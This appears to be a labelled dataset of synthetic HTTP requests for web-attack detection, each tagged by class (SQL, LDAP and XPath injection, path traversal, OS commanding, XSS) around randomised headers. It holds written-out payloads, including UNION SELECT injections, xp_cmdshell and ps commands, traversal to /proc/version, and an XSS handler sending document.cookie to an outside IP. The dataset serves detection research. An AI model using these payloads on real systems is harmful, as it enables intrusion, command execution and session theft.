UA-Color: color32
UA-Pixels: 053x237
Via: 8.5 66.3.123.210, 2.7 249.88.93.53
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44433
Start - Id: 38488
class: LdapInjection
GET /auyJrEOK/be0yZeee/Ctauyhsi/nAxdPPTnSAgn9JPLD/TQ/gBZmJ7.pOdjHe/HraCdsuei/xEaRhzv/oFPpkKqQ./o1coazWK9@nGu3fhO7b/ncrc0ald4/rCsEhCTA1H9.jf6Ff.dll?oa=aeaiedtcf6oD%2Bad&JTXxDlocationhzlibla=%29%28++%7C++%28displayName%3Dhad*%29+++%28name+++%3Dhad*+++%29%28++++mail%3Dhad*+++%29 HTTP/1.0
Host: www.etat9fR.it:80
Connection: keep-alive
Accept: image/gif, application/*;q=0.6, video/*
Accept-Charset: x-mac-korean;q=0.9, shift_jis, iso-10646-ucs-2, windows-1258, utf-7
Accept-Encoding: *;q=0.1
Accept-Language: hsyrl-tfsop, tcepoQi-iep0E, uhtYROai-fboame, tR-sD
Cache-Control: only-if-cached
Client-ip: 233.33.102.205
Cookie: autoexecMxbpUbin7includeXiS=f8C@R4Q
Cookie2: $Version="370"
Date: Mon, 12 Jul 04 11:22:51 CET
ETag: "TciWgfyFegrTeCENGp.D"
Expect: deissg=asa6
From: yowh@sjoa6l6daa.gov
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 14:24:55 CET
Max-Forwards: 3
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: -58851,3847-,8968-910
Referer: http://www.naytv4d.ch/9tiihhre/iwbt.php
TE: trailers
Trailer: Authorization
User-Agent: dtus/9.1.1.4
UA-CPU: 68000
UA-Disp: 2438,693,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: eOuio; acielhr=eAuthr3
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 748 218.206.210.84 "59neemNylty8eilereeP" "Tue, 26 Feb 08 18:29:12 UTC"
X-Forwarded-For: 21.183.247.173
X-Serial-Number: 8565701730547644653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38488
Start - Id: 46168
class: PathTransversal
GET /JJPtsZQsamWtelnetrWCopt-/hFH05/tnooaiziecmpo0snsip/joreU@mNRcp/qz8rG8/ereee71aeSs/2eot6hk.shtml?rouyaSuoks7n=UigiesmbompaifmpEy&Y4sY1k4=hl&@ziframe4havingH3O_=592006&bteatEA5holA=htpassthrueTuchsdiAebstyle&isskl2jpr=auodd3&ci=l.84i&cisE=++whereda&ttemmf6Frfob=899&csla=-homeupdateh&7@vX%uAJX=995&tBCdSwindow.openS@E=%2Bh&oUt=aSd4Cj-V&I3Ld0ad=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.0
Host: www.Fq8odec1et.gov
Connection: close
Accept: audio/basic
Accept-Charset: x-mac-turkish;q=0.5, windows-1257;q=0.2, iso-10646-ucs-2, isiri-3342, big5;q=0.5
Accept-Encoding: deflate;q=0.1, compress;q=0.2, compress
Accept-Language: *;q=0.5
Cache-Control: max-age=6
Client-ip: 231.104.230.202
Cookie: eip=HlPt;iCsnlnkecd7oie=6755266;4ylt80oEr=8;execkoliby=7UNq3igDVpsz;hgsond=iuelgnnime;QAiu=19556
Cookie2: $Version="276"
Date: Tue, 27 Feb 07 06:50:49 GMT
ETag: "XxIGPTgMgE9f0ZK"
Expect: xemI2=gseaTsb
From: Dilvo9h@ht8heE6li.fr
If-Modified-Since: Mon, 26 Dec 05 05:24:26 UTC
If-Unmodified-Since: Thu, 01 Jul 04 06:11:24 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: aofr fhssn=atea
Authorization: Digest username="nId1rsoO"
Range: -51066
Referer: /Hts8etda.png
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 3.3; bn-ry; rv:1.3.6) Gecko/77224554
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.9 63.96.226.125
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46168
Start - Id: 41402
class: SqlInjection
PUT /iaWDcDa.wM18zd5qc_Eq/sozd4c6oyrodeeqelhl/rterhro4aeflwyonE/JcnLiAUXn/0bavh5aseaes/Raadxrohbt/eAnmpv-/iHz5-vLMUVD9hyb7Mtg5.jpeg? HTTP/1.0
Content-Length: 204
Content-Language: slheu,y2lcfha
Content-Encoding: compress
Content-Location: http://eerenb.uk/5reeb/itakxng/l9heh/homtn/h5e8eiml.tar
Content-MD5: dDBhaXRhYXp0c3RlbXJ0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 23:12:59 GMT
Last-Modified: Fri, 03 Apr 09 07:19:46 GMT
Host: 61.189.159.230
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: s0cena-rlaz, miahm-oyngg;q=0.0, tcandt-h;q=0.4
Cache-Control: max-stale=56020
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Sat, 21 Nov 09 16:17:00 CET
ETag: W/"4J6x5mzh8-Y-JyUpc_o"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 18 May 08 09:14:33 CET
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: *
If-None-Match: *
If-Range: "sB8DEn_22an-e@8q@HVB"
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: cTtsb nlsttnre=nmx5nae7
Range: 711-
Referer: http://nrao2.ch/aspmsoa/1oauaiq/3trC/6fne.mpg
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 6.9; t9-t7; rv:9.8.9) Gecko/51003004
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: mg7/7.0 133.105.200.235, HTTP/3.6 42.140.248.93
Transfer-Encoding: deflate
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

iltLw63nc=74&1include1pgJQ@l3=Detadi&auOt=ncchthcc6o3n&eigXrz9etO8ha=hia&drtatb=969&atssopnhnaCnhgd=' )  UNION    ALL     SELECT   55 FROM    sia   WHERE (   ''=   '&Oen9SaotptIeosu=|eg[

End - Id: 41402
Start - Id: 41972
class: SqlInjection
GET /esRh/sntn.bin?gsdEaCon7ecub=ttsfr5sliZNu&tLCroeoae3=ttn%40%5Cooq&lFd=p&tfe9hMcat3aT=%27++++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F171%2F**%2FFROM%2F**%2F6ioY%2F**%2FWHERE%2F**%2F%28+++%27%27%3D++%27+++++%2F**%2F&1buhzbowrtpsdE=etI HTTP/1.0
Host: 14.59.133.146
Connection: rlueGer4
Accept: audio/*;q=0.8
Accept-Charset: shift_jis, hz-gb-2312
Accept-Encoding: identity;q=0.2, deflate
Accept-Language: t-t, ebwtixnl-lq, rhtRep-arjare;q=0.8, wm-eIe1
Cache-Control: no-store
Client-ip: 124.187.36.33
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="6"
Date: Wed, 08 Feb 06 14:52:14 CET
ETag: "F6yDl2ELctqx5Q34"
Expect: 100-continue
From: 7SEma7le@snwitHoOk.it
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: "dxvF6lyQDbQTXq9joK"
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 16
MIME-Version: 0.8
Pragma: h=6
Proxy-Authorization: awzeh4 1EetAatb=raaaa9e
Authorization: NTLM c25kYW9pSXRyOWh3bHd0VGVlbmlJZWxtYVJTYmVidG9yeUZucHRkbGM4M3RkeXU=
Range: 991-40833,238399-36
Referer: /ahleUrL/EeOaslse/siyin.dll
TE: trailers,chunked;q=0.7,trailers
Trailer: If-Range
User-Agent: Mozilla/1.9 (X11; U; Solaris 9.5; vN-aN; rv:5.0.0) Gecko/24910412
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: HTTP/2.7 www.e1fsorj.tiff, 2.5 85.169.153.48, 4twbt/4.1 59.126.200.32
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 878 www.m8otxgo2.html "lOumtte0b2oihqtE7us5" "Tue, 26 Dec 06 07:16:10 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41972
Start - Id: 44727
class: PathTransversal
POST /a@60OgtUperM37U1Nxe/sfp/p@R_bSA-xVWevbscriptq/Ecrez1hezroespo3ed1/9Y_6Aq8/lemSo6n0.js? HTTP/1.1
Content-Length: 315
Content-Language: ypil3,ab,4r
Content-Encoding: compress
Content-Location: /Wey4i/fh8aEbe/3sltne.cfm
Content-MD5: bm55TmxyaXVuaGREQ2Vicw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 14:54:25 GMT
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: 75.117.64.108
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=160
Cookie: rirojEd=or~;6enfrom5zeishttpsvbscriptH9& E;b3NooMacxndhoN=sECkrpIzsc
Cookie2: $Version="8"
Date: Fri, 27 Feb 04 01:21:10 GMT
ETag: W/"p0je_Dz12UVNKDAZp9"
Expect: 3tnOdwe7=nohiayee
If-Modified-Since: Fri, 15 Aug 08 02:55:37 GMT
If-Unmodified-Since: Tue, 04 Mar 08 18:56:28 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Jun 07 16:58:49 GMT
Max-Forwards: 635
Pragma: no-cache
Authorization: Digest nonce
Referer: /icades/natrhp/obimo7p/uttet57.js
User-Agent: ctcitt6td7r
Via: htn/1.6 www.bHid.jpg, 8.7 241.137.9.191, 9.4 188.109.92.187
Warning: 204 40.231.234.46 "eLujf" "Wed, 31 Dec 08 20:00:10 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

xp_-5bP=autoexecr&svRW_T_C=i&wes=s3eYw.by&ercaEisxu1tStu=wsu&ape3oeeurnwen=ws&7dzdteesc=dvdvg4VFS&etvthitSyfis=tdMTe.dH6&hisBeeurteire=ntr&gityydnehieih=collection(     file:///c:/Y9u/tRuntd.xml)&vqSME==r<supdate&elnedeesif7rcEm=811603&otw9eaei99n7meg=29-u&TEnE=4Gly0on&rtetht3Nndgeda=09948514

End - Id: 44727
Start - Id: 41251
class: SqlInjection
GET /osdooanum00ehen/a7QM7rPSXFyh.jpeg?axnyytTeh=365&ec4Loanubxil=tsg&4sotutio=sSee&oehtemtqREsh=Yp2EhbenlEo1kisa&hfnte=13408&rh6qh83aue=671&aBEAucana=ovSb&iwrreA=taor&eedamxnIgddtp=-atxc&nteinse2p=iKS4La&ubsrto1ode=259927025 HTTP/1.1
Host: 156.211.19.121
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.4, cp-950, windows-1250, koi8
Accept-Encoding: 
Accept-Language: '  OR 'dhuifslltaa' <   'X
Cache-Control: min-fresh=217
Client-ip: 156.64.250.125
Cookie: csy4Dr=oTeaZan;Xejresuit=ore
Cookie2: $Version="05"
Date: Mon, 11 Oct 04 17:40:46 UTC
ETag: W/"S9Z8LZskFpYVZo2x"
Expect: 100-continue
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 01 Oct 04 11:42:27 UTC
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "9ot@EsXAGipBvI@F"
If-Range: Fri, 14 May 04 12:32:40 UTC
Max-Forwards: 1378
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic cnNhRW5uZWQ6ZGg4ZA==
Range: 377941-4452
Referer: http://www.ttoaza.biz/Asusc/mmsfati6/o7xhcer/ettlwsE9.jpg
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: ixclanes (2awPCiSyIg; mmBZgXc; eoCq---M6; apmWFju5)
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: huna0/1.7 182.191.133.226
Transfer-Encoding: deflate
Upgrade: tno/0.7, leolp/4.5, ixwe/8.3
Warning: 735 149.242.13.102:8 "sooeIuiaiic2aizp" 
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 43432074729165077
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41251
Start - Id: 36658
class: OsCommanding
GET /oyVB7J0h5cnbmF_vuaRF.sh?Ushtdth0=4A8n4chroddds%5D&e9etd=e+biuln0rY0o%7Ce8&omEee=%7C++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C&ee=hfFej64K.P&PWODcHHfjSxvbscript=7&m4efqtl=Cf&udasELTestoo=ru6o1hath7er&liAsflu=3082 HTTP/1.1
Host: 160.75.72.163:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8, iso-10646-ucs-2;q=0.5, cp-932
Accept-Encoding: *
Accept-Language: w-tai7n;q=0.3
Cache-Control: max-stale
Client-ip: 112.112.39.6
Cookie: Oenoea725ri=fnptgst$n;tnemz=7ycekbO;pall=45969
Cookie2: $Version="51"
Date: Sun, 16 Aug 09 04:52:25 UTC
ETag: "15WRkN9JUW7JXa-Rohbh"
Expect: oxde
From: zeiTo@a5ng.biz
If-Modified-Since: Tue, 20 Oct 09 04:52:56 UTC
If-Unmodified-Since: Fri, 31 Jul 09 01:41:52 CET
If-Match: *
If-None-Match: "x_4jj.q1t-TWghFYU"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 702
MIME-Version: 0.9
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: knwa2 hhrais7=2pEA
Range: -2,66-,4884-
Referer: /ceji5m/kfRooo/56t7/zhrn4ib/esciy.swf
TE: chunked;q=0.1,gzip
Trailer: Warning
User-Agent: Mozilla/0.5 (compatible; Konqueror/8.8; Open BSD i586; hleLaf3t; s98a; i6l0)
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: identity
Upgrade: ojr3e/2.9, tEafil/9.1, h5s/7.6
Warning: 422 www.hrhl.png "selsiuieia" "Thu, 06 Sep 07 15:49:14 GMT"
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 2420868137853987546
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36658
Start - Id: 46825
class: XSS
POST /Eae/lmt1hEo8odsodesc/e1.css? HTTP/1.1
Content-Length: 178
Content-Language: e,sHhwff,iN5rcah
Content-Encoding: gzip
Content-Location: http://www.stne.fr/orAEcio/ftptzqH/ostSde/bnclra.swf
Content-MD5: a2VmbTJvWjF0dDVzNG9nbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Mar 09 12:01:47 CET
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 11.150.21.188
Connection: close
Accept: image/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 169.136.109.14
Cookie: oRrArl5t7cd=ss;4SeElehrut=9Itx iekrRbr
Cookie2: $Version="9"
Date: Sun, 30 Mar 08 09:04:58 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Wed, 12 Sep 07 18:51:32 GMT
If-Match: *
If-None-Match: "5X1PibNWeYgXao4x"
If-Range: Sun, 15 Nov 09 04:58:10 GMT
Max-Forwards: 9492
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Digest cnonce="rw8aho"
Range: 04-141477,-19
Referer: /ncbSe7u/ei1irgd/nBryb.rar
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: i7SYuM4 http://www.hpRendsr.gov
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/6.8 www.metSrcu.png, ritte/6.7 182.1.169.83, 6.2 www.eaelnwg.css
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iothrrw5=eyhe;l b sl0V&38TtEprIE=<div  onmouseover    = "  [window.open('http://71.237.166.63/le.jsp'+document.cookie);]     ">&PurEr=29823956

End - Id: 46825
Start - Id: 43127
class: OsCommanding
GET /snEhWdIDY/tQK_vAJ0cXrZKKytjb/hid/iT/mZROB4eKSkj3_1a.jsp?oorneryctt84t=%27+%3Bps+++++-aux+++%3B HTTP/1.1
Host: 69.92.111.141
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: iw0ho=74;FnQ998XMFw5=eo
Cookie2: $Version="87"
Date: Fri, 02 Oct 09 10:10:17 UTC
ETag: W/"Cv3aZiHwV@pvaMWbTtE"
Expect: 100-continue
From: ydaj1@ewfas0rh.de
If-Modified-Since: Tue, 22 Feb 05 18:46:10 GMT
If-Unmodified-Since: Tue, 10 Jan 06 01:09:37 GMT
If-Match: *
If-None-Match: "s.GdZdgEq.9Dlacw"
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 9774
MIME-Version: 0.8
Pragma: kae='nrif'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: eNodk sc5hecln=nadovak
Range: 94856-,22-022
Referer: http://www.sajtee.uk/c7cyma/o4h5fiti/thxeee.php
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: taosse4b
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.9 www.ltekati.gif, FTP/0.1 204.183.65.54, 0.2 www.iewsdn.png
Transfer-Encoding: identity
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43127
Start - Id: 49736
class: XPathInjection
GET /0K59UmibPX8.jpg?rossdtsA9H=tKZO9&eta=6601156&osltnurj=pTf5lq5ehssaqu8l&ieyus5rmel0=eic&e1hC=isnr7%7Ci%29i&8tmLe2Teattp=sen&aeoorFhs=Oet%27%5D++%7C+++P+++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28++%29++++%3D+%27ayge&tepteyEhrlceocE=eiframei&vbLsjy=776&S-htpass.71B=hqXZw&R1OfromI5BKk.=jzAxL5Ukow&erTadsDicosJ=ssock_streamnetcat&Mob=s&loes=6udatnfnsCega HTTP/1.0
Host: www.iapiSttcr.it
Connection: tzAehw
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: kgnweidd-0;q=0.6, 1inOte9X-abnugwh;q=0.1, tsno6m-sus;q=0.4
Cache-Control: 6ror7niu=nLt
Client-ip: 24.134.122.55
Cookie: eeit8n=rood;cc=snBp2P6G;earatf=jJu;Nd=fxreplacehedlnadaotnea;XlERq=7AAe0az60s
Cookie2: $Version="05"
Date: Sat, 22 Nov 08 18:26:50 GMT
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Sat, 30 May 09 10:20:15 CET
If-Match: "dQEuefFbIxp4tn.NinJ"
If-None-Match: "-3FzpY@tOfQqwYOBqG"
If-Range: *
Max-Forwards: 26
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: /lfss/wlobdaeh/aeir/qiatnine/i2ei.tiff
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 7.4; ik-se; rv:1.3.3) Gecko/92251030
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: anIn/6.4 www.akaoa.png:6
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49736
Start - Id: 44986
class: PathTransversal
GET /s_fLomup/aMLBhp/l@Yk5rPnw/ybir1I/svWKN@.js?oD57jRt=file%3A%2F%2F%2Fs%3A%2Ftl%2Feaah%2FLiodeee.xml&sO3rg=e&aeDushse=4028808&LXJA9aeDwJ=8295 HTTP/1.1
Host: www.Iiem.de
Connection: keep-alive
Accept: image/png;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 223.133.197.156
Cookie: diah=o+N9e9+Es ;qqs
Cookie2: $Version="6"
Date: Sun, 03 Feb 08 20:48:53 UTC
ETag: W/"kfg0XtToc0DOOERgOPz"
Expect: potvSX=cregh;Dgtzo=behsO1a
From: esra@5dfeusd9Lo.de
If-Modified-Since: Thu, 09 Nov 06 11:54:56 UTC
If-Unmodified-Since: Tue, 22 Mar 05 16:23:36 CET
If-Match: "Opw1G7v@ZJeL8o26m"
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: *
Max-Forwards: 6025
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: NTLM dWZlbHVobjJ0YW5vb3hzdXp0ZXRobk13dVZsZ0RjcmhvZWhtaHQ=
Range: 73-,999598-14093
Referer: http://z9aET.st/8gwyd/aeAltH/lealy/sEtwdn.jsp
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: ifietsa
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: deflate
Upgrade: d7xp/5.9, eqo/0.5, QOiaE/6.5, etnjl/1.3, wyhl/7.7
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 8606404239
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44986
Start - Id: 50023
class: XPathInjection
PUT /o1PsBKF/nImnohrmi/mJ_03GPs-WpassthruIJk/0q-hQu4/ds6eoi/sKalUsc@kfxjBK7mH/2wi.php3? HTTP/1.1
Content-Length: 121
Content-Language: e84xmeos,wosal,aakwueeo
Content-Encoding: gzip
Content-MD5: d2pGdGlha2lsZW9BZmkybA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 17 Apr 04 08:13:22 GMT
Host: 44.156.25.198
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-jp, iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: iuc-n3eelll;q=0.1, oniCI-alRc;q=0.1, ohtt4eir-cmnsc, iarxs-kwIHR
Cache-Control: hn4sLr=ha
Cookie: vhsontrveR8sgEh=xp3Aadxb/tx6
Cookie2: $Version="14"
Date: Sun, 14 Nov 04 03:42:05 UTC
Expect: 100-continue
From: rr0e5a@p6PSnt5Xu.de
If-None-Match: *
Max-Forwards: 56
Referer: http://www.nsaeaB.net/eYhfm.pl
TE: gzip;q=0.8,trailers,gzip
User-Agent: (i   <   count(Iihbub/child::text())    and     j   <    count(1d/child::comment())   and   k    <  count(eTatks/child::*)    )
UA-Color: color32
UA-Pixels: 412x6538
Upgrade: odsrn/7.3, noifE/8.7
----: ----------------------------------

03gw=eta5%5Dnyy&og=et7&o2isseitirsy=l%26rgsm7Etcapan5ozbtelnet&rTeprm9tmnt=326&ts1eDevi=3oia0manlbEiteiot&.Zyi@MF%uH6=455

End - Id: 50023
Start - Id: 36423
class: OsCommanding
GET /dK13c6RVinsertru2-Yl/zmeta35Gif@autoexecprocessing-instructiono/titnf4Aj@@P/tmsI@.-w/lH.oGfM9Abcopy/IhIlii/iC0P-Z8Ymv9/dYk@AwxhE3/frunartleminnse3amu/l1s9E9lxDET0.png?xcztllsdmzu=r6oM6WkLT&p9ra6mtrZ=exec++xp_cmdshell++++%27%22uw6hjT6jto%22++%3E%3E++++script.vbs%27 HTTP/1.0
Host: www.sikde.org
Connection: close
Accept: application/zip;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.2, deflate, compress;q=0.4
Accept-Language: nhnhPi-s, do-atigea;q=0.4
Cache-Control: max-stale=996
Date: Fri, 13 May 05 16:54:27 CET
If-Modified-Since: Sat, 07 Jan 06 06:11:54 GMT
If-Unmodified-Since: Thu, 30 Jul 09 18:38:21 CET
If-Match: *
If-Range: Sun, 20 Jul 08 11:41:49 GMT
Max-Forwards: 109
Referer: /roLcZ.mpeg
User-Agent: Mozilla/0.4 (X11; U; Linux i586 3.5; 9y-as; rv:1.7.6) Gecko/90254632
Via: 9.7 www.nechs4.jpeg:30329, wr2q/3.2 www.tTlzifn.htm

null

End - Id: 36423
Start - Id: 48736
class: XPathInjection
GET /5GeW0.swf?0bLao=246&edlot3nstd=dM3c6qtAnngsernreo&Eg=wbfpfe&mE9tithr=ddw0%40&pRmknull@XRinr=99628&tz2rit3DytiOeS=attek&he=25551+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+820%3D&nroa=aerusxTt1sc&5Dfusr=72315092&crEf=5&3epsDoehrohblag=oROLp1k6YVB&inauw=1mdll&v4yS=0gY8vXW HTTP/1.1
Host: www.cfoUn.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: uti-iseytern;q=0.4
Cache-Control: min-fresh=31
Client-ip: 80.135.128.144
Cookie: atHhdoUme=Teieeamind;SorM=i;oe3otI9nMwi=105;58IGPxD5MsU=sbo;hmNslm=marr3he;rajtlsaosntaiAe=rE z
Cookie2: $Version="20"
Date: Fri, 13 Aug 04 23:10:51 UTC
ETag: W/"K9qtuGj_MBzd3YVA"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Sun, 25 Sep 05 11:35:52 GMT
If-Unmodified-Since: Tue, 30 Jun 09 22:10:07 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: *
Max-Forwards: 333
MIME-Version: 1.5
Pragma: 5qwtxct=nv
Proxy-Authorization: Digest uri=/otrw4ske.cfm
